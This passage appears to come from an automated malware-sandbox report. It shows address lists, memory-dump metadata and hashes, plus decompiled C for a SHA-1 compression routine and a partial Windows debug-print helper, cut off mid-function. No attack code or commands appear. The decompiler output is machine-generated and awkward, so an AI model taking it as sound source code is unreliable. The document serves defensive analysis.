                                                                                                    0x00438d84
                                                                                                    0x00438d87
                                                                                                    0x00438d90
                                                                                                    0x00438d96
                                                                                                    0x00438d9f
                                                                                                    0x00438dae
                                                                                                    0x00438db5
                                                                                                    0x00438db8
                                                                                                    0x00438dbb
                                                                                                    0x00438dc4
                                                                                                    0x00438dc7
                                                                                                    0x00438dca
                                                                                                    0x00438de2
                                                                                                    0x00438de9
                                                                                                    0x00438deb
                                                                                                    0x00438dee
                                                                                                    0x00438df1
                                                                                                    0x00438dfa
                                                                                                    0x00438e01
                                                                                                    0x00438e04
                                                                                                    0x00438e07
                                                                                                    0x00438e16
                                                                                                    0x00438e1d
                                                                                                    0x00438e20
                                                                                                    0x00438e23
                                                                                                    0x00438e2c
                                                                                                    0x00438e36
                                                                                                    0x00438e39
                                                                                                    0x00438e45
                                                                                                    0x00438e48
                                                                                                    0x00438e4f
                                                                                                    0x00438e52
                                                                                                    0x00438e55
                                                                                                    0x00438e5a
                                                                                                    0x00438e5d
                                                                                                    0x00438e66
                                                                                                    0x00438e77
                                                                                                    0x00438e7a
                                                                                                    0x00438e7d
                                                                                                    0x00438e84
                                                                                                    0x00438e87
                                                                                                    0x00438e8a
                                                                                                    0x00438e8d
                                                                                                    0x00438e8f
                                                                                                    0x00438e92
                                                                                                    0x00438e95
                                                                                                    0x00438e9e
                                                                                                    0x00438ea3
                                                                                                    0x00438ea3
                                                                                                    0x00438eb8
                                                                                                    0x00438ebb
                                                                                                    0x00438ebe
                                                                                                    0x00438ec5
                                                                                                    0x00438ec8
                                                                                                    0x00438ecb
                                                                                                    0x00438ee0
                                                                                                    0x00438ee7
                                                                                                    0x00438eea
                                                                                                    0x00438eee
                                                                                                    0x00438ef1
                                                                                                    0x00438ef6
                                                                                                    0x00438ef9
                                                                                                    0x00438f08
                                                                                                    0x00438f0b
                                                                                                    0x00438f12
                                                                                                    0x00438f15
                                                                                                    0x00438f18
                                                                                                    0x00438f1b
                                                                                                    0x00438f1e
                                                                                                    0x00438f26
                                                                                                    0x00438f34
                                                                                                    0x00438f37
                                                                                                    0x00438f3a
                                                                                                    0x00438f3a
                                                                                                    0x00438f41
                                                                                                    0x00438f44
                                                                                                    0x00438f47
                                                                                                    0x00438f4f
                                                                                                    0x00438f5d
                                                                                                    0x00438f60
                                                                                                    0x00438f67
                                                                                                    0x00438f6a
                                                                                                    0x00438f6d
                                                                                                    0x00438f70
                                                                                                    0x00438f73
                                                                                                    0x00438f7c
                                                                                                    0x00438f83
                                                                                                    0x00438f83
                                                                                                    0x00438f89
                                                                                                    0x00438fa2
                                                                                                    0x00438fa5
                                                                                                    0x00438fac
                                                                                                    0x00438faf
                                                                                                    0x00438fb2
                                                                                                    0x00438fc4
                                                                                                    0x00438fce
                                                                                                    0x00438fd1
                                                                                                    0x00438fda
                                                                                                    0x00438fdd
                                                                                                    0x00438fe4
                                                                                                    0x00438fe7
                                                                                                    0x00438fed
                                                                                                    0x00439000
                                                                                                    0x00439007
                                                                                                    0x0043900a
                                                                                                    0x0043900d
                                                                                                    0x00439010
                                                                                                    0x00439019
                                                                                                    0x0043901c
                                                                                                    0x0043902f
                                                                                                    0x00439032
                                                                                                    0x0043903c
                                                                                                    0x0043903f
                                                                                                    0x00439041
                                                                                                    0x0043904a
                                                                                                    0x0043904d
                                                                                                    0x00439060
                                                                                                    0x00439066
                                                                                                    0x00439069
                                                                                                    0x00439070
                                                                                                    0x00439072
                                                                                                    0x00439075
                                                                                                    0x00439078
                                                                                                    0x0043907b
                                                                                                    0x0043907e
                                                                                                    0x00439081
                                                                                                    0x0043908a
                                                                                                    0x0043908f
                                                                                                    0x00439092
                                                                                                    0x00439092
                                                                                                    0x004390a5
                                                                                                    0x004390a8
                                                                                                    0x004390ab
                                                                                                    0x004390b2
                                                                                                    0x004390b5
                                                                                                    0x004390b8
                                                                                                    0x004390bb
                                                                                                    0x004390ce
                                                                                                    0x004390d1
                                                                                                    0x004390dc
                                                                                                    0x004390df
                                                                                                    0x004390eb
                                                                                                    0x004390ee
                                                                                                    0x004390f4
                                                                                                    0x004390f7
                                                                                                    0x004390fa
                                                                                                    0x00439101
                                                                                                    0x00439111
                                                                                                    0x00439114
                                                                                                    0x0043911a
                                                                                                    0x0043911d
                                                                                                    0x00439124
                                                                                                    0x00439126
                                                                                                    0x00439129
                                                                                                    0x0043912c
                                                                                                    0x0043912f
                                                                                                    0x00439132
                                                                                                    0x00439139
                                                                                                    0x00439148
                                                                                                    0x0043914b
                                                                                                    0x00439152
                                                                                                    0x00439155
                                                                                                    0x00439158
                                                                                                    0x0043915b
                                                                                                    0x0043915e
                                                                                                    0x00439161
                                                                                                    0x00439164
                                                                                                    0x0043916d
                                                                                                    0x0043917e
                                                                                                    0x00439186
                                                                                                    0x0043918c
                                                                                                    0x0043918f
                                                                                                    0x00439191
                                                                                                    0x00439194
                                                                                                    0x00439197
                                                                                                    0x004391a4

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429843332.0000000000430000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429892463.000000000044D000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429905966.000000000044E000.00000020.00000001.sdmp Download File
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (
                                                                                                    • API String ID: 0-3887548279
                                                                                                    • Opcode ID: 9d6855784675a5e35dd7f46bffc505ce3ef55d2335aefdb758dcc85adafe48e3
                                                                                                    • Instruction ID: 447d871f050fd0395b1e45202c5d18e685f731b18236de6725743f0436533b3e
                                                                                                    • Opcode Fuzzy Hash: 9d6855784675a5e35dd7f46bffc505ce3ef55d2335aefdb758dcc85adafe48e3
                                                                                                    • Instruction Fuzzy Hash: D0021CB6E006199FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00438C60, Relevance: 1.7, Strings: 1, Instructions: 423COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 73%
                                                                                                    			E00438C60(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t325;
				signed int _t334;
				signed int _t340;
				signed int _t341;
				signed int _t346;
				signed int _t353;
				signed int _t357;
				signed int _t358;
				signed int _t362;
				signed int _t365;
				signed int _t369;
				signed int _t370;
				signed int _t399;
				signed int _t404;
				signed int _t410;
				signed int _t413;
				signed int _t420;
				signed int _t423;
				signed int _t432;
				signed int _t434;
				signed int _t437;
				signed int _t445;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t470;
				signed int _t478;
				signed int _t479;
				signed int* _t480;
				signed int* _t481;
				signed int _t488;
				signed int _t491;
				signed int _t496;
				signed int _t499;
				signed int _t502;
				signed int _t505;
				signed int _t506;
				signed int _t510;
				signed int _t522;
				signed int _t525;
				signed int _t532;
				void* _t536;

				_t481 = _a4;
				_t353 = 0;
				_t2 =  &(_t481[7]); // 0x1b
				_t277 = _t2;
				do {
					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
					_t353 = _t353 + 4;
					_t277 =  &(_t277[0x10]);
				} while (_t353 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t399 =  *(_t278 - 0x18);
					_t459 =  *(_t278 - 0x14);
					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
					_t278[8] = _t357;
					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t318 ^ _t399;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
				} while ( *_t46 != 0);
				_t320 =  *_t481;
				_t279 = _t481[1];
				_t358 = _t481[2];
				_t404 = _t481[3];
				_v12 = _t320;
				_v16 = _t481[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t462 = _v8;
					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t323 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t404;
					_v12 = _t488;
					asm("rol esi, 0x5");
					_v8 = _t358;
					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t491 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t362 = _v12;
					_v8 = _t323;
					_t325 = _v8;
					_v12 = _t410;
					asm("rol edx, 0x5");
					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t413 = _v12;
					_v16 = _t491;
					asm("ror ecx, 0x2");
					_v8 = _t362;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t325;
					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t358 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t413;
					_v12 = _t496;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t404 = _v8;
					asm("ror ecx, 0x2");
					_t463 = _t462 + 5;
					_t320 = _t499;
					_v12 = _t320;
					_v8 = _t463;
				} while (_t463 < 0x14);
				_t464 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t404;
					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t334 = _v12;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t505 = _t279;
					_v16 = _t358;
					_t365 = _v12;
					_v12 = _t420;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t423 = _v12;
					_v8 = _t334;
					_v8 = _t365;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t464 = _t464 + 5;
					_t358 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t423;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_t404 = _v8;
					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
				} while (_t464 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t404;
					asm("ror eax, 0x2");
					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
					_t470 = _v12;
					_v12 = _t510;
					asm("rol esi, 0x5");
					_t340 = _v8;
					asm("ror edi, 0x2");
					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
					_v16 = _t358;
					_t369 = _v12;
					_v12 = _t432;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t470;
					_v12 = _t434;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t437 = _t369;
					_t358 = _v12;
					_v8 = _t437;
					_v12 = _t522;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
					_t404 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
					_t341 = _t340 + 5;
					_v8 = _t341;
				} while (_t341 < 0x3c);
				_t478 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t479 = _v8;
					asm("ror eax, 0x2");
					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
					_t346 = _v12;
					_v16 = _t404;
					_v12 = _t525;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
					_v16 = _t358;
					_t370 = _v12;
					_v12 = _t445;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
					_t404 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t346;
					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t370;
					_v8 = _t346;
					asm("ror edx, 0x2");
					_v8 = _t370;
					_t358 = _v12;
					_v12 = _t532;
					asm("rol esi, 0x5");
					_t478 = _t479 + 5;
					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t404;
					_v12 = _t499;
					_v8 = _t478;
				} while (_t478 < 0x50);
				_t480 = _a4;
				_t480[2] = _t480[2] + _t358;
				_t480[3] = _t480[3] + _t404;
				_t311 = _t480[4] + _v16;
				 *_t480 =  *_t480 + _t499;
				_t480[1] = _t480[1] + _t279;
				_t480[4] = _t311;
				_t480[0x17] = 0;
				return _t311;
			}
































































                                                                                                    0x00438c6b
                                                                                                    0x00438c6f
                                                                                                    0x00438c71
                                                                                                    0x00438c71
                                                                                                    0x00438c74
                                                                                                    0x00438c96
                                                                                                    0x00438cbc
                                                                                                    0x00438ce2
                                                                                                    0x00438d04
                                                                                                    0x00438d0b
                                                                                                    0x00438d0e
                                                                                                    0x00438d11
                                                                                                    0x00438d1a
                                                                                                    0x00438d20
                                                                                                    0x00438d27
                                                                                                    0x00438d38
                                                                                                    0x00438d3b
                                                                                                    0x00438d3e
                                                                                                    0x00438d42
                                                                                                    0x00438d44
                                                                                                    0x00438d46
                                                                                                    0x00438d4f
                                                                                                    0x00438d52
                                                                                                    0x00438d55
                                                                                                    0x00438d60
                                                                                                    0x00438d66
                                                                                                    0x00438d68
                                                                                                    0x00438d68
                                                                                                    0x00438d6b
                                                                                                    0x00438d6e
                                                                                                    0x00438d6e
                                                                                                    0x00438d73
                                                                                                    0x00438d75
                                                                                                    0x00438d78
                                                                                                    0x00438d7b
                                                                                                    0x00438d81
                                                                                                    0x00438d84
                                                                                                    0x00438d87
                                                                                                    0x00438d90
                                                                                                    0x00438d96
                                                                                                    0x00438d9f
                                                                                                    0x00438dae
                                                                                                    0x00438db5
                                                                                                    0x00438db8
                                                                                                    0x00438dbb
                                                                                                    0x00438dc4
                                                                                                    0x00438dc7
                                                                                                    0x00438dca
                                                                                                    0x00438de2
                                                                                                    0x00438de9
                                                                                                    0x00438deb
                                                                                                    0x00438dee
                                                                                                    0x00438df1
                                                                                                    0x00438dfa
                                                                                                    0x00438e01
                                                                                                    0x00438e04
                                                                                                    0x00438e07
                                                                                                    0x00438e16
                                                                                                    0x00438e1d
                                                                                                    0x00438e20
                                                                                                    0x00438e23
                                                                                                    0x00438e2c
                                                                                                    0x00438e36
                                                                                                    0x00438e39
                                                                                                    0x00438e45
                                                                                                    0x00438e48
                                                                                                    0x00438e4f
                                                                                                    0x00438e52
                                                                                                    0x00438e55
                                                                                                    0x00438e5a
                                                                                                    0x00438e5d
                                                                                                    0x00438e66
                                                                                                    0x00438e77
                                                                                                    0x00438e7a
                                                                                                    0x00438e7d
                                                                                                    0x00438e84
                                                                                                    0x00438e87
                                                                                                    0x00438e8a
                                                                                                    0x00438e8d
                                                                                                    0x00438e8f
                                                                                                    0x00438e92
                                                                                                    0x00438e95
                                                                                                    0x00438e9e
                                                                                                    0x00438ea3
                                                                                                    0x00438ea3
                                                                                                    0x00438eb8
                                                                                                    0x00438ebb
                                                                                                    0x00438ebe
                                                                                                    0x00438ec5
                                                                                                    0x00438ec8
                                                                                                    0x00438ecb
                                                                                                    0x00438ee0
                                                                                                    0x00438ee7
                                                                                                    0x00438eea
                                                                                                    0x00438eee
                                                                                                    0x00438ef1
                                                                                                    0x00438ef6
                                                                                                    0x00438ef9
                                                                                                    0x00438f08
                                                                                                    0x00438f0b
                                                                                                    0x00438f12
                                                                                                    0x00438f15
                                                                                                    0x00438f18
                                                                                                    0x00438f1b
                                                                                                    0x00438f1e
                                                                                                    0x00438f26
                                                                                                    0x00438f34
                                                                                                    0x00438f37
                                                                                                    0x00438f3a
                                                                                                    0x00438f3a
                                                                                                    0x00438f41
                                                                                                    0x00438f44
                                                                                                    0x00438f47
                                                                                                    0x00438f4f
                                                                                                    0x00438f5d
                                                                                                    0x00438f60
                                                                                                    0x00438f67
                                                                                                    0x00438f6a
                                                                                                    0x00438f6d
                                                                                                    0x00438f70
                                                                                                    0x00438f73
                                                                                                    0x00438f7c
                                                                                                    0x00438f83
                                                                                                    0x00438f83
                                                                                                    0x00438f89
                                                                                                    0x00438fa2
                                                                                                    0x00438fa5
                                                                                                    0x00438fac
                                                                                                    0x00438faf
                                                                                                    0x00438fb2
                                                                                                    0x00438fc4
                                                                                                    0x00438fce
                                                                                                    0x00438fd1
                                                                                                    0x00438fda
                                                                                                    0x00438fdd
                                                                                                    0x00438fe4
                                                                                                    0x00438fe7
                                                                                                    0x00438fed
                                                                                                    0x00439000
                                                                                                    0x00439007
                                                                                                    0x0043900a
                                                                                                    0x0043900d
                                                                                                    0x00439010
                                                                                                    0x00439019
                                                                                                    0x0043901c
                                                                                                    0x0043902f
                                                                                                    0x00439032
                                                                                                    0x0043903c
                                                                                                    0x0043903f
                                                                                                    0x00439041
                                                                                                    0x0043904a
                                                                                                    0x0043904d
                                                                                                    0x00439060
                                                                                                    0x00439066
                                                                                                    0x00439069
                                                                                                    0x00439070
                                                                                                    0x00439072
                                                                                                    0x00439075
                                                                                                    0x00439078
                                                                                                    0x0043907b
                                                                                                    0x0043907e
                                                                                                    0x00439081
                                                                                                    0x0043908a
                                                                                                    0x0043908f
                                                                                                    0x00439092
                                                                                                    0x00439092
                                                                                                    0x004390a5
                                                                                                    0x004390a8
                                                                                                    0x004390ab
                                                                                                    0x004390b2
                                                                                                    0x004390b5
                                                                                                    0x004390b8
                                                                                                    0x004390bb
                                                                                                    0x004390ce
                                                                                                    0x004390d1
                                                                                                    0x004390dc
                                                                                                    0x004390df
                                                                                                    0x004390eb
                                                                                                    0x004390ee
                                                                                                    0x004390f4
                                                                                                    0x004390f7
                                                                                                    0x004390fa
                                                                                                    0x00439101
                                                                                                    0x00439111
                                                                                                    0x00439114
                                                                                                    0x0043911a
                                                                                                    0x0043911d
                                                                                                    0x00439124
                                                                                                    0x00439126
                                                                                                    0x00439129
                                                                                                    0x0043912c
                                                                                                    0x0043912f
                                                                                                    0x00439132
                                                                                                    0x00439139
                                                                                                    0x00439148
                                                                                                    0x0043914b
                                                                                                    0x00439152
                                                                                                    0x00439155
                                                                                                    0x00439158
                                                                                                    0x0043915b
                                                                                                    0x0043915e
                                                                                                    0x00439161
                                                                                                    0x00439164
                                                                                                    0x0043916d
                                                                                                    0x0043917e
                                                                                                    0x00439186
                                                                                                    0x0043918c
                                                                                                    0x0043918f
                                                                                                    0x00439191
                                                                                                    0x00439194
                                                                                                    0x00439197
                                                                                                    0x004391a4

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429843332.0000000000430000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429892463.000000000044D000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429905966.000000000044E000.00000020.00000001.sdmp Download File
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (
                                                                                                    • API String ID: 0-3887548279
                                                                                                    • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                    • Instruction ID: 1b491e8201672924d81679931a5b08eccac5715f3e224e3c2a1f3bf6dfeb4260
                                                                                                    • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                    • Instruction Fuzzy Hash: DD022CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00A8B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 78%
                                                                                                    			E00A8B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0xb5f7a8);
				E00ADD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E00ADD130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E00ACD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E00ACF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											E00ADDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E00ACB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E00ACB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E00ACE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
